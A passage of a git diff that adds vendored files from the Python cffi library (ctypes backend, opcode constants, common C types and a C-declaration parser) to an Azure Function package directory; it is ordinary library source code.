len(fnames): + raise ValueError("too many values for %s initializer" % + CTypesStructOrUnion._get_c_name()) + init = dict(zip(fnames, init)) + addr = ctypes.addressof(blob) + for fname, value in init.items(): + BField, bitsize = name2fieldtype[fname] + assert bitsize < 0, \ + "not implemented: initializer with bit fields" + offset = CTypesStructOrUnion._offsetof(fname) + PTR = ctypes.POINTER(BField._ctype) + p = ctypes.cast(addr + offset, PTR) + BField._initialize(p.contents, value) + is_union = CTypesStructOrUnion._kind == 'union' + name2fieldtype = dict(zip(fnames, zip(btypes, bitfields))) + # + for fname, BField, bitsize in fields: + if fname == '': + raise NotImplementedError("nested anonymous structs/unions") + if hasattr(CTypesStructOrUnion, fname): + raise ValueError("the field name %r conflicts in " + "the ctypes backend" % fname) + if bitsize < 0: + def getter(self, fname=fname, BField=BField, + offset=CTypesStructOrUnion._offsetof(fname), + PTR=ctypes.POINTER(BField._ctype)): + addr = ctypes.addressof(self._blob) + p = ctypes.cast(addr + offset, PTR) + return BField._from_ctypes(p.contents) + def setter(self, value, fname=fname, BField=BField): + setattr(self._blob, fname, BField._to_ctypes(value)) + # + if issubclass(BField, CTypesGenericArray): + setter = None + if BField._declared_length == 0: + def getter(self, fname=fname, BFieldPtr=BField._CTPtr, + offset=CTypesStructOrUnion._offsetof(fname), + PTR=ctypes.POINTER(BField._ctype)): + addr = ctypes.addressof(self._blob) + p = ctypes.cast(addr + offset, PTR) + return BFieldPtr._from_ctypes(p) + # + else: + def getter(self, fname=fname, BField=BField): + return BField._from_ctypes(getattr(self._blob, fname)) + def setter(self, value, fname=fname, BField=BField): + # xxx obscure workaround + value = BField._to_ctypes(value) + oldvalue = getattr(self._blob, fname) + setattr(self._blob, fname, value) + if value != getattr(self._blob, fname): + setattr(self._blob, fname, oldvalue) + raise OverflowError("value too large for bitfield") + setattr(CTypesStructOrUnion, fname, property(getter, setter)) + # + CTypesPtr = self.ffi._get_cached_btype(model.PointerType(tp)) + for fname in fnames: + if hasattr(CTypesPtr, fname): + raise ValueError("the field name %r conflicts in " + "the ctypes backend" % fname) + def getter(self, fname=fname): + return getattr(self[0], fname) + def setter(self, value, fname=fname): + setattr(self[0], fname, value) + setattr(CTypesPtr, fname, property(getter, setter)) + + def new_function_type(self, BArgs, BResult, has_varargs): + nameargs = [BArg._get_c_name() for BArg in BArgs] + if has_varargs: + nameargs.append('...') + nameargs = ', '.join(nameargs) + # + class CTypesFunctionPtr(CTypesGenericPtr): + __slots__ = ['_own_callback', '_name'] + _ctype = ctypes.CFUNCTYPE(getattr(BResult, '_ctype', None), + *[BArg._ctype for BArg in BArgs], + use_errno=True) + _reftypename = BResult._get_c_name('(* &)(%s)' % (nameargs,)) + + def __init__(self, init, error=None): + # create a callback to the Python callable init() + import traceback + assert not has_varargs, "varargs not supported for callbacks" + if getattr(BResult, '_ctype', None) is not None: + error = BResult._from_ctypes( + BResult._create_ctype_obj(error)) + else: + error = None + def callback(*args): + args2 = [] + for arg, BArg in zip(args, BArgs): + args2.append(BArg._from_ctypes(arg)) + try: + res2 = init(*args2) + res2 = BResult._to_ctypes(res2) + except: + traceback.print_exc() + res2 = error + if issubclass(BResult, CTypesGenericPtr): + if res2: + res2 = ctypes.cast(res2, ctypes.c_void_p).value + # .value: http://bugs.python.org/issue1574593 + else: + res2 = None + #print repr(res2) + return res2 + if issubclass(BResult, CTypesGenericPtr): + # The only pointers callbacks can return are void*s: + # http://bugs.python.org/issue5710 + callback_ctype = ctypes.CFUNCTYPE( + ctypes.c_void_p, + *[BArg._ctype for BArg in BArgs], + use_errno=True) + else: + callback_ctype = CTypesFunctionPtr._ctype + self._as_ctype_ptr = callback_ctype(callback) + self._address = ctypes.cast(self._as_ctype_ptr, + ctypes.c_void_p).value + self._own_callback = init + + @staticmethod + def _initialize(ctypes_ptr, value): + if value: + raise NotImplementedError("ctypes backend: not supported: " + "initializers for function pointers") + + def __repr__(self): + c_name = getattr(self, '_name', None) + if c_name: + i = self._reftypename.index('(* &)') + if self._reftypename[i-1] not in ' )*': + c_name = ' ' + c_name + c_name = self._reftypename.replace('(* &)', c_name) + return CTypesData.__repr__(self, c_name) + + def _get_own_repr(self): + if getattr(self, '_own_callback', None) is not None: + return 'calling %r' % (self._own_callback,) + return super(CTypesFunctionPtr, self)._get_own_repr() + + def __call__(self, *args): + if has_varargs: + assert len(args) >= len(BArgs) + extraargs = args[len(BArgs):] + args = args[:len(BArgs)] + else: + assert len(args) == len(BArgs) + ctypes_args = [] + for arg, BArg in zip(args, BArgs): + ctypes_args.append(BArg._arg_to_ctypes(arg)) + if has_varargs: + for i, arg in enumerate(extraargs): + if arg is None: + ctypes_args.append(ctypes.c_void_p(0)) # NULL + continue + if not isinstance(arg, CTypesData): + raise TypeError( + "argument %d passed in the variadic part " + "needs to be a cdata object (got %s)" % + (1 + len(BArgs) + i, type(arg).__name__)) + ctypes_args.append(arg._arg_to_ctypes(arg)) + result = self._as_ctype_ptr(*ctypes_args) + return BResult._from_ctypes(result) + # + CTypesFunctionPtr._fix_class() + return CTypesFunctionPtr + + def new_enum_type(self, name, enumerators, enumvalues, CTypesInt): + assert isinstance(name, str) + reverse_mapping = dict(zip(reversed(enumvalues), + reversed(enumerators))) + # + class CTypesEnum(CTypesInt): + __slots__ = [] + _reftypename = '%s &' % name + + def _get_own_repr(self): + value = self._value + try: + return '%d: %s' % (value, reverse_mapping[value]) + except KeyError: + return str(value) + + def _to_string(self, maxlen): + value = self._value + try: + return reverse_mapping[value] + except KeyError: + return str(value) + # + CTypesEnum._fix_class() + return CTypesEnum + + def get_errno(self): + return ctypes.get_errno() + + def set_errno(self, value): + ctypes.set_errno(value) + + def string(self, b, maxlen=-1): + return b._to_string(maxlen) + + def buffer(self, bptr, size=-1): + raise NotImplementedError("buffer() with ctypes backend") + + def sizeof(self, cdata_or_BType): + if isinstance(cdata_or_BType, CTypesData): + return cdata_or_BType._get_size_of_instance() + else: + assert issubclass(cdata_or_BType, CTypesData) + return cdata_or_BType._get_size() + + def alignof(self, BType): + assert issubclass(BType, CTypesData) + return BType._alignment() + + def newp(self, BType, source): + if not issubclass(BType, CTypesData): + raise TypeError + return BType._newp(source) + + def cast(self, BType, source): + return BType._cast_from(source) + + def callback(self, BType, source, error, onerror): + assert onerror is None # XXX not implemented + return BType(source, error) + + _weakref_cache_ref = None + + def gcp(self, cdata, destructor, size=0): + if self._weakref_cache_ref is None: + import weakref + class MyRef(weakref.ref): + def __eq__(self, other): + myref = self() + return self is other or ( + myref is not None and myref is other()) + def __ne__(self, other): + return not (self == other) + def __hash__(self): + try: + return self._hash + except AttributeError: + self._hash = hash(self()) + return self._hash + self._weakref_cache_ref = {}, MyRef + weak_cache, MyRef = self._weakref_cache_ref + + if destructor is None: + try: + del weak_cache[MyRef(cdata)] + except KeyError: + raise TypeError("Can remove destructor only on a object " + "previously returned by ffi.gc()") + return None + + def remove(k): + cdata, destructor = weak_cache.pop(k, (None, None)) + if destructor is not None: + destructor(cdata) + + new_cdata = self.cast(self.typeof(cdata), cdata) + assert new_cdata is not cdata + weak_cache[MyRef(new_cdata, remove)] = (cdata, destructor) + return new_cdata + + typeof = type + + def getcname(self, BType, replace_with): + return BType._get_c_name(replace_with) + + def typeoffsetof(self, BType, fieldname, num=0): + if isinstance(fieldname, str): + if num == 0 and issubclass(BType, CTypesGenericPtr): + BType = BType._BItem + if not issubclass(BType, CTypesBaseStructOrUnion): + raise TypeError("expected a struct or union ctype") + BField = BType._bfield_types[fieldname] + if BField is Ellipsis: + raise TypeError("not supported for bitfields") + return (BField, BType._offsetof(fieldname)) + elif isinstance(fieldname, (int, long)): + if issubclass(BType, CTypesGenericArray): + BType = BType._CTPtr + if not issubclass(BType, CTypesGenericPtr): + raise TypeError("expected an array or ptr ctype") + BItem = BType._BItem + offset = BItem._get_size() * fieldname + if offset > sys.maxsize: + raise OverflowError + return (BItem, offset) + else: + raise TypeError(type(fieldname)) + + def rawaddressof(self, BTypePtr, cdata, offset=None): + if isinstance(cdata, CTypesBaseStructOrUnion): + ptr = ctypes.pointer(type(cdata)._to_ctypes(cdata)) + elif isinstance(cdata, CTypesGenericPtr): + if offset is None or not issubclass(type(cdata)._BItem, + CTypesBaseStructOrUnion): + raise TypeError("unexpected cdata type") + ptr = type(cdata)._to_ctypes(cdata) + elif isinstance(cdata, CTypesGenericArray): + ptr = type(cdata)._to_ctypes(cdata) + else: + raise TypeError("expected a ") + if offset: + ptr = ctypes.cast( + ctypes.c_void_p( + ctypes.cast(ptr, ctypes.c_void_p).value + offset), + type(ptr)) + return BTypePtr._from_ctypes(ptr) + + +class CTypesLibrary(object): + + def __init__(self, backend, cdll): + self.backend = backend + self.cdll = cdll + + def load_function(self, BType, name): + c_func = getattr(self.cdll, name) + funcobj = BType._from_ctypes(c_func) + funcobj._name = name + return funcobj + + def read_variable(self, BType, name): + try: + ctypes_obj = BType._ctype.in_dll(self.cdll, name) + except AttributeError as e: + raise NotImplementedError(e) + return BType._from_ctypes(ctypes_obj) + + def write_variable(self, BType, name, value): + new_ctypes_obj = BType._to_ctypes(value) + ctypes_obj = BType._ctype.in_dll(self.cdll, name) + ctypes.memmove(ctypes.addressof(ctypes_obj), + ctypes.addressof(new_ctypes_obj), + ctypes.sizeof(BType._ctype)) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/cffi_opcode.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/cffi_opcode.py new file mode 100644 index 0000000..b26ccc9 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/cffi_opcode.py @@ -0,0 +1,187 @@ +from .error import VerificationError + +class CffiOp(object): + def __init__(self, op, arg): + self.op = op + self.arg = arg + + def as_c_expr(self): + if self.op is None: + assert isinstance(self.arg, str) + return '(_cffi_opcode_t)(%s)' % (self.arg,) + classname = CLASS_NAME[self.op] + return '_CFFI_OP(_CFFI_OP_%s, %s)' % (classname, self.arg) + + def as_python_bytes(self): + if self.op is None and self.arg.isdigit(): + value = int(self.arg) # non-negative: '-' not in self.arg + if value >= 2**31: + raise OverflowError("cannot emit %r: limited to 2**31-1" + % (self.arg,)) + return format_four_bytes(value) + if isinstance(self.arg, str): + raise VerificationError("cannot emit to Python: %r" % (self.arg,)) + return format_four_bytes((self.arg << 8) | self.op) + + def __str__(self): + classname = CLASS_NAME.get(self.op, self.op) + return '(%s %s)' % (classname, self.arg) + +def format_four_bytes(num): + return '\\x%02X\\x%02X\\x%02X\\x%02X' % ( + (num >> 24) & 0xFF, + (num >> 16) & 0xFF, + (num >> 8) & 0xFF, + (num ) & 0xFF) + +OP_PRIMITIVE = 1 +OP_POINTER = 3 +OP_ARRAY = 5 +OP_OPEN_ARRAY = 7 +OP_STRUCT_UNION = 9 +OP_ENUM = 11 +OP_FUNCTION = 13 +OP_FUNCTION_END = 15 +OP_NOOP = 17 +OP_BITFIELD = 19 +OP_TYPENAME = 21 +OP_CPYTHON_BLTN_V = 23 # varargs +OP_CPYTHON_BLTN_N = 25 # noargs +OP_CPYTHON_BLTN_O = 27 # O (i.e. a single arg) +OP_CONSTANT = 29 +OP_CONSTANT_INT = 31 +OP_GLOBAL_VAR = 33 +OP_DLOPEN_FUNC = 35 +OP_DLOPEN_CONST = 37 +OP_GLOBAL_VAR_F = 39 +OP_EXTERN_PYTHON = 41 + +PRIM_VOID = 0 +PRIM_BOOL = 1 +PRIM_CHAR = 2 +PRIM_SCHAR = 3 +PRIM_UCHAR = 4 +PRIM_SHORT = 5 +PRIM_USHORT = 6 +PRIM_INT = 7 +PRIM_UINT = 8 +PRIM_LONG = 9 +PRIM_ULONG = 10 +PRIM_LONGLONG = 11 +PRIM_ULONGLONG = 12 +PRIM_FLOAT = 13 +PRIM_DOUBLE = 14 +PRIM_LONGDOUBLE = 15 + +PRIM_WCHAR = 16 +PRIM_INT8 = 17 +PRIM_UINT8 = 18 +PRIM_INT16 = 19 +PRIM_UINT16 = 20 +PRIM_INT32 = 21 +PRIM_UINT32 = 22 +PRIM_INT64 = 23 +PRIM_UINT64 = 24 +PRIM_INTPTR = 25 +PRIM_UINTPTR = 26 +PRIM_PTRDIFF = 27 +PRIM_SIZE = 28 +PRIM_SSIZE = 29 +PRIM_INT_LEAST8 = 30 +PRIM_UINT_LEAST8 = 31 +PRIM_INT_LEAST16 = 32 +PRIM_UINT_LEAST16 = 33 +PRIM_INT_LEAST32 = 34 +PRIM_UINT_LEAST32 = 35 +PRIM_INT_LEAST64 = 36 +PRIM_UINT_LEAST64 = 37 +PRIM_INT_FAST8 = 38 +PRIM_UINT_FAST8 = 39 +PRIM_INT_FAST16 = 40 +PRIM_UINT_FAST16 = 41 +PRIM_INT_FAST32 = 42 +PRIM_UINT_FAST32 = 43 +PRIM_INT_FAST64 = 44 +PRIM_UINT_FAST64 = 45 +PRIM_INTMAX = 46 +PRIM_UINTMAX = 47 +PRIM_FLOATCOMPLEX = 48 +PRIM_DOUBLECOMPLEX = 49 +PRIM_CHAR16 = 50 +PRIM_CHAR32 = 51 + +_NUM_PRIM = 52 +_UNKNOWN_PRIM = -1 +_UNKNOWN_FLOAT_PRIM = -2 +_UNKNOWN_LONG_DOUBLE = -3 + +_IO_FILE_STRUCT = -1 + +PRIMITIVE_TO_INDEX = { + 'char': PRIM_CHAR, + 'short': PRIM_SHORT, + 'int': PRIM_INT, + 'long': PRIM_LONG, + 'long long': PRIM_LONGLONG, + 'signed char': PRIM_SCHAR, + 'unsigned char': PRIM_UCHAR, + 'unsigned short': PRIM_USHORT, + 'unsigned int': PRIM_UINT, + 'unsigned long': PRIM_ULONG, + 'unsigned long long': PRIM_ULONGLONG, + 'float': PRIM_FLOAT, + 'double': PRIM_DOUBLE, + 'long double': PRIM_LONGDOUBLE, + 'float _Complex': PRIM_FLOATCOMPLEX, + 'double _Complex': PRIM_DOUBLECOMPLEX, + '_Bool': PRIM_BOOL, + 'wchar_t': PRIM_WCHAR, + 'char16_t': PRIM_CHAR16, + 'char32_t': PRIM_CHAR32, + 'int8_t': PRIM_INT8, + 'uint8_t': PRIM_UINT8, + 'int16_t': PRIM_INT16, + 'uint16_t': PRIM_UINT16, + 'int32_t': PRIM_INT32, + 'uint32_t': PRIM_UINT32, + 'int64_t': PRIM_INT64, + 'uint64_t': PRIM_UINT64, + 'intptr_t': PRIM_INTPTR, + 'uintptr_t': PRIM_UINTPTR, + 'ptrdiff_t': PRIM_PTRDIFF, + 'size_t': PRIM_SIZE, + 'ssize_t': PRIM_SSIZE, + 'int_least8_t': PRIM_INT_LEAST8, + 'uint_least8_t': PRIM_UINT_LEAST8, + 'int_least16_t': PRIM_INT_LEAST16, + 'uint_least16_t': PRIM_UINT_LEAST16, + 'int_least32_t': PRIM_INT_LEAST32, + 'uint_least32_t': PRIM_UINT_LEAST32, + 'int_least64_t': PRIM_INT_LEAST64, + 'uint_least64_t': PRIM_UINT_LEAST64, + 'int_fast8_t': PRIM_INT_FAST8, + 'uint_fast8_t': PRIM_UINT_FAST8, + 'int_fast16_t': PRIM_INT_FAST16, + 'uint_fast16_t': PRIM_UINT_FAST16, + 'int_fast32_t': PRIM_INT_FAST32, + 'uint_fast32_t': PRIM_UINT_FAST32, + 'int_fast64_t': PRIM_INT_FAST64, + 'uint_fast64_t': PRIM_UINT_FAST64, + 'intmax_t': PRIM_INTMAX, + 'uintmax_t': PRIM_UINTMAX, + } + +F_UNION = 0x01 +F_CHECK_FIELDS = 0x02 +F_PACKED = 0x04 +F_EXTERNAL = 0x08 +F_OPAQUE = 0x10 + +G_FLAGS = dict([('_CFFI_' + _key, globals()[_key]) + for _key in ['F_UNION', 'F_CHECK_FIELDS', 'F_PACKED', + 'F_EXTERNAL', 'F_OPAQUE']]) + +CLASS_NAME = {} +for _name, _value in list(globals().items()): + if _name.startswith('OP_') and isinstance(_value, int): + CLASS_NAME[_value] = _name[3:] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/commontypes.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/commontypes.py new file mode 100644 index 0000000..e5045ee --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/commontypes.py @@ -0,0 +1,80 @@ +import sys +from . import model +from .error import FFIError + + +COMMON_TYPES = {} + +try: + # fetch "bool" and all simple Windows types + from _cffi_backend import _get_common_types + _get_common_types(COMMON_TYPES) +except ImportError: + pass + +COMMON_TYPES['FILE'] = model.unknown_type('FILE', '_IO_FILE') +COMMON_TYPES['bool'] = '_Bool' # in case we got ImportError above + +for _type in model.PrimitiveType.ALL_PRIMITIVE_TYPES: + if _type.endswith('_t'): + COMMON_TYPES[_type] = _type +del _type + +_CACHE = {} + +def resolve_common_type(parser, commontype): + try: + return _CACHE[commontype] + except KeyError: + cdecl = COMMON_TYPES.get(commontype, commontype) + if not isinstance(cdecl, str): + result, quals = cdecl, 0 # cdecl is already a BaseType + elif cdecl in model.PrimitiveType.ALL_PRIMITIVE_TYPES: + result, quals = model.PrimitiveType(cdecl), 0 + elif cdecl == 'set-unicode-needed': + raise FFIError("The Windows type %r is only available after " + "you call ffi.set_unicode()" % (commontype,)) + else: + if commontype == cdecl: + raise FFIError( + "Unsupported type: %r. Please look at " + "http://cffi.readthedocs.io/en/latest/cdef.html#ffi-cdef-limitations " + "and file an issue if you think this type should really " + "be supported." % (commontype,)) + result, quals = parser.parse_type_and_quals(cdecl) # recursive + + assert isinstance(result, model.BaseTypeByIdentity) + _CACHE[commontype] = result, quals + return result, quals + + +# ____________________________________________________________ +# extra types for Windows (most of them are in commontypes.c) + + +def win_common_types(): + return { + "UNICODE_STRING": model.StructType( + "_UNICODE_STRING", + ["Length", + "MaximumLength", + "Buffer"], + [model.PrimitiveType("unsigned short"), + model.PrimitiveType("unsigned short"), + model.PointerType(model.PrimitiveType("wchar_t"))], + [-1, -1, -1]), + "PUNICODE_STRING": "UNICODE_STRING *", + "PCUNICODE_STRING": "const UNICODE_STRING *", + + "TBYTE": "set-unicode-needed", + "TCHAR": "set-unicode-needed", + "LPCTSTR": "set-unicode-needed", + "PCTSTR": "set-unicode-needed", + "LPTSTR": "set-unicode-needed", + "PTSTR": "set-unicode-needed", + "PTBYTE": "set-unicode-needed", + "PTCHAR": "set-unicode-needed", + } + +if sys.platform == 'win32': + COMMON_TYPES.update(win_common_types()) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/cparser.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/cparser.py new file mode 100644 index 0000000..c4acd23 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/cparser.py @@ -0,0 +1,1006 @@ +from . import model +from .commontypes import COMMON_TYPES, resolve_common_type +from .error import FFIError, CDefError +try: + from . import _pycparser as pycparser +except ImportError: + import pycparser +import weakref, re, sys + +try: + if sys.version_info < (3,): + import thread as _thread + else: + import _thread + lock = _thread.allocate_lock() +except ImportError: + lock = None + +def _workaround_for_static_import_finders(): + # Issue #392: packaging tools like cx_Freeze can not find these + # because pycparser uses exec dynamic import. This is an obscure + # workaround. This function is never called. + import pycparser.yacctab + import pycparser.lextab + +CDEF_SOURCE_STRING = "" +_r_comment = re.compile(r"/\*.*?\*/|//([^\n\\]|\\.)*?$", + re.DOTALL | re.MULTILINE) +_r_define = re.compile(r"^\s*#\s*define\s+([A-Za-z_][A-Za-z_0-9]*)" + r"\b((?:[^\n\\]|\\.)*?)$", + re.DOTALL | re.MULTILINE) +_r_line_directive = re.compile(r"^[ \t]*#[ \t]*(?:line|\d+)\b.*$", re.MULTILINE) +_r_partial_enum = re.compile(r"=\s*\.\.\.\s*[,}]|\.\.\.\s*\}") +_r_enum_dotdotdot = re.compile(r"__dotdotdot\d+__$") +_r_partial_array = re.compile(r"\[\s*\.\.\.\s*\]") +_r_words = re.compile(r"\w+|\S") +_parser_cache = None +_r_int_literal = re.compile(r"-?0?x?[0-9a-f]+[lu]*$", re.IGNORECASE) +_r_stdcall1 = re.compile(r"\b(__stdcall|WINAPI)\b") +_r_stdcall2 = re.compile(r"[(]\s*(__stdcall|WINAPI)\b") +_r_cdecl = re.compile(r"\b__cdecl\b") +_r_extern_python = re.compile(r'\bextern\s*"' + r'(Python|Python\s*\+\s*C|C\s*\+\s*Python)"\s*.') +_r_star_const_space = re.compile( # matches "* const " + r"[*]\s*((const|volatile|restrict)\b\s*)+") +_r_int_dotdotdot = re.compile(r"(\b(int|long|short|signed|unsigned|char)\s*)+" + r"\.\.\.") +_r_float_dotdotdot = re.compile(r"\b(double|float)\s*\.\.\.") + +def _get_parser(): + global _parser_cache + if _parser_cache is None: + _parser_cache = pycparser.CParser() + return _parser_cache + +def _workaround_for_old_pycparser(csource): + # Workaround for a pycparser issue (fixed between pycparser 2.10 and + # 2.14): "char*const***" gives us a wrong syntax tree, the same as + # for "char***(*const)". This means we can't tell the difference + # afterwards. But "char(*const(***))" gives us the right syntax + # tree. The issue only occurs if there are several stars in + # sequence with no parenthesis inbetween, just possibly qualifiers. + # Attempt to fix it by adding some parentheses in the source: each + # time we see "* const" or "* const *", we add an opening + # parenthesis before each star---the hard part is figuring out where + # to close them. + parts = [] + while True: + match = _r_star_const_space.search(csource) + if not match: + break + #print repr(''.join(parts)+csource), '=>', + parts.append(csource[:match.start()]) + parts.append('('); closing = ')' + parts.append(match.group()) # e.g. "* const " + endpos = match.end() + if csource.startswith('*', endpos): + parts.append('('); closing += ')' + level = 0 + i = endpos + while i < len(csource): + c = csource[i] + if c == '(': + level += 1 + elif c == ')': + if level == 0: + break + level -= 1 + elif c in ',;=': + if level == 0: + break + i += 1 + csource = csource[endpos:i] + closing + csource[i:] + #print repr(''.join(parts)+csource) + parts.append(csource) + return ''.join(parts) + +def _preprocess_extern_python(csource): + # input: `extern "Python" int foo(int);` or + # `extern "Python" { int foo(int); }` + # output: + # void __cffi_extern_python_start; + # int foo(int); + # void __cffi_extern_python_stop; + # + # input: `extern "Python+C" int foo(int);` + # output: + # void __cffi_extern_python_plus_c_start; + # int foo(int); + # void __cffi_extern_python_stop; + parts = [] + while True: + match = _r_extern_python.search(csource) + if not match: + break + endpos = match.end() - 1 + #print + #print ''.join(parts)+csource + #print '=>' + parts.append(csource[:match.start()]) + if 'C' in match.group(1): + parts.append('void __cffi_extern_python_plus_c_start; ') + else: + parts.append('void __cffi_extern_python_start; ') + if csource[endpos] == '{': + # grouping variant + closing = csource.find('}', endpos) + if closing < 0: + raise CDefError("'extern \"Python\" {': no '}' found") + if csource.find('{', endpos + 1, closing) >= 0: + raise NotImplementedError("cannot use { } inside a block " + "'extern \"Python\" { ... }'") + parts.append(csource[endpos+1:closing]) + csource = csource[closing+1:] + else: + # non-grouping variant + semicolon = csource.find(';', endpos) + if semicolon < 0: + raise CDefError("'extern \"Python\": no ';' found") + parts.append(csource[endpos:semicolon+1]) + csource = csource[semicolon+1:] + parts.append(' void __cffi_extern_python_stop;') + #print ''.join(parts)+csource + #print + parts.append(csource) + return ''.join(parts) + +def _warn_for_string_literal(csource): + if '"' not in csource: + return + for line in csource.splitlines(): + if '"' in line and not line.lstrip().startswith('#'): + import warnings + warnings.warn("String literal found in cdef() or type source. " + "String literals are ignored here, but you should " + "remove them anyway because some character sequences " + "confuse pre-parsing.") + break + +def _warn_for_non_extern_non_static_global_variable(decl): + if not decl.storage: + import warnings + warnings.warn("Global variable '%s' in cdef(): for consistency " + "with C it should have a storage class specifier " + "(usually 'extern')" % (decl.name,)) + +def _remove_line_directives(csource): + # _r_line_directive matches whole lines, without the final \n, if they + # start with '#line' with some spacing allowed, or '#NUMBER'. This + # function stores them away and replaces them with exactly the string + # '#line@N', where N is the index in the list 'line_directives'. + line_directives = [] + def replace(m): + i = len(line_directives) + line_directives.append(m.group()) + return '#line@%d' % i + csource = _r_line_directive.sub(replace, csource) + return csource, line_directives + +def _put_back_line_directives(csource, line_directives): + def replace(m): + s = m.group() + if not s.startswith('#line@'): + raise AssertionError("unexpected #line directive " + "(should have been processed and removed") + return line_directives[int(s[6:])] + return _r_line_directive.sub(replace, csource) + +def _preprocess(csource): + # First, remove the lines of the form '#line N "filename"' because + # the "filename" part could confuse the rest + csource, line_directives = _remove_line_directives(csource) + # Remove comments. NOTE: this only work because the cdef() section + # should not contain any string literals (except in line directives)! + def replace_keeping_newlines(m): + return ' ' + m.group().count('\n') * '\n' + csource = _r_comment.sub(replace_keeping_newlines, csource) + # Remove the "#define FOO x" lines + macros = {} + for match in _r_define.finditer(csource): + macroname, macrovalue = match.groups() + macrovalue = macrovalue.replace('\\\n', '').strip() + macros[macroname] = macrovalue + csource = _r_define.sub('', csource) + # + if pycparser.__version__ < '2.14': + csource = _workaround_for_old_pycparser(csource) + # + # BIG HACK: replace WINAPI or __stdcall with "volatile const". + # It doesn't make sense for the return type of a function to be + # "volatile volatile const", so we abuse it to detect __stdcall... + # Hack number 2 is that "int(volatile *fptr)();" is not valid C + # syntax, so we place the "volatile" before the opening parenthesis. + csource = _r_stdcall2.sub(' volatile volatile const(', csource) + csource = _r_stdcall1.sub(' volatile volatile const ', csource) + csource = _r_cdecl.sub(' ', csource) + # + # Replace `extern "Python"` with start/end markers + csource = _preprocess_extern_python(csource) + # + # Now there should not be any string literal left; warn if we get one + _warn_for_string_literal(csource) + # + # Replace "[...]" with "[__dotdotdotarray__]" + csource = _r_partial_array.sub('[__dotdotdotarray__]', csource) + # + # Replace "...}" with "__dotdotdotNUM__}". This construction should + # occur only at the end of enums; at the end of structs we have "...;}" + # and at the end of vararg functions "...);". Also replace "=...[,}]" + # with ",__dotdotdotNUM__[,}]": this occurs in the enums too, when + # giving an unknown value. + matches = list(_r_partial_enum.finditer(csource)) + for number, match in enumerate(reversed(matches)): + p = match.start() + if csource[p] == '=': + p2 = csource.find('...', p, match.end()) + assert p2 > p + csource = '%s,__dotdotdot%d__ %s' % (csource[:p], number, + csource[p2+3:]) + else: + assert csource[p:p+3] == '...' + csource = '%s __dotdotdot%d__ %s' % (csource[:p], number, + csource[p+3:]) + # Replace "int ..." or "unsigned long int..." with "__dotdotdotint__" + csource = _r_int_dotdotdot.sub(' __dotdotdotint__ ', csource) + # Replace "float ..." or "double..." with "__dotdotdotfloat__" + csource = _r_float_dotdotdot.sub(' __dotdotdotfloat__ ', csource) + # Replace all remaining "..." with the same name, "__dotdotdot__", + # which is declared with a typedef for the purpose of C parsing. + csource = csource.replace('...', ' __dotdotdot__ ') + # Finally, put back the line directives + csource = _put_back_line_directives(csource, line_directives) + return csource, macros + +def _common_type_names(csource): + # Look in the source for what looks like usages of types from the + # list of common types. A "usage" is approximated here as the + # appearance of the word, minus a "definition" of the type, which + # is the last word in a "typedef" statement. Approximative only + # but should be fine for all the common types. + look_for_words = set(COMMON_TYPES) + look_for_words.add(';') + look_for_words.add(',') + look_for_words.add('(') + look_for_words.add(')') + look_for_words.add('typedef') + words_used = set() + is_typedef = False + paren = 0 + previous_word = '' + for word in _r_words.findall(csource): + if word in look_for_words: + if word == ';': + if is_typedef: + words_used.discard(previous_word) + look_for_words.discard(previous_word) + is_typedef = False + elif word == 'typedef': + is_typedef = True + paren = 0 + elif word == '(': + paren += 1 + elif word == ')': + paren -= 1 + elif word == ',': + if is_typedef and paren == 0: + words_used.discard(previous_word) + look_for_words.discard(previous_word) + else: # word in COMMON_TYPES + words_used.add(word) + previous_word = word + return words_used + + +class Parser(object): + + def __init__(self): + self._declarations = {} + self._included_declarations = set() + self._anonymous_counter = 0 + self._structnode2type = weakref.WeakKeyDictionary() + self._options = {} + self._int_constants = {} + self._recomplete = [] + self._uses_new_feature = None + + def _parse(self, csource): + csource, macros = _preprocess(csource) + # XXX: for more efficiency we would need to poke into the + # internals of CParser... the following registers the + # typedefs, because their presence or absence influences the + # parsing itself (but what they are typedef'ed to plays no role) + ctn = _common_type_names(csource) + typenames = [] + for name in sorted(self._declarations): + if name.startswith('typedef '): + name = name[8:] + typenames.append(name) + ctn.discard(name) + typenames += sorted(ctn) + # + csourcelines = [] + csourcelines.append('# 1 ""') + for typename in typenames: + csourcelines.append('typedef int %s;' % typename) + csourcelines.append('typedef int __dotdotdotint__, __dotdotdotfloat__,' + ' __dotdotdot__;') + # this forces pycparser to consider the following in the file + # called from line 1 + csourcelines.append('# 1 "%s"' % (CDEF_SOURCE_STRING,)) + csourcelines.append(csource) + fullcsource = '\n'.join(csourcelines) + if lock is not None: + lock.acquire() # pycparser is not thread-safe... + try: + ast = _get_parser().parse(fullcsource) + except pycparser.c_parser.ParseError as e: + self.convert_pycparser_error(e, csource) + finally: + if lock is not None: + lock.release() + # csource will be used to find buggy source text + return ast, macros, csource + + def _convert_pycparser_error(self, e, csource): + # xxx look for ":NUM:" at the start of str(e) + # and interpret that as a line number. This will not work if + # the user gives explicit ``# NUM "FILE"`` directives. + line = None + msg = str(e) + match = re.match(r"%s:(\d+):" % (CDEF_SOURCE_STRING,), msg) + if match: + linenum = int(match.group(1), 10) + csourcelines = csource.splitlines() + if 1 <= linenum <= len(csourcelines): + line = csourcelines[linenum-1] + return line + + def convert_pycparser_error(self, e, csource): + line = self._convert_pycparser_error(e, csource) + + msg = str(e) + if line: + msg = 'cannot parse "%s"\n%s' % (line.strip(), msg) + else: + msg = 'parse error\n%s' % (msg,) + raise CDefError(msg) + + def parse(self, csource, override=False, packed=False, pack=None, + dllexport=False): + if packed: + if packed != True: + raise ValueError("'packed' should be False or True; use " + "'pack' to give another value") + if pack: + raise ValueError("cannot give both 'pack' and 'packed'") + pack = 1 + elif pack: + if pack & (pack - 1): + raise ValueError("'pack' must be a power of two, not %r" % + (pack,)) + else: + pack = 0 + prev_options = self._options + try: + self._options = {'override': override, + 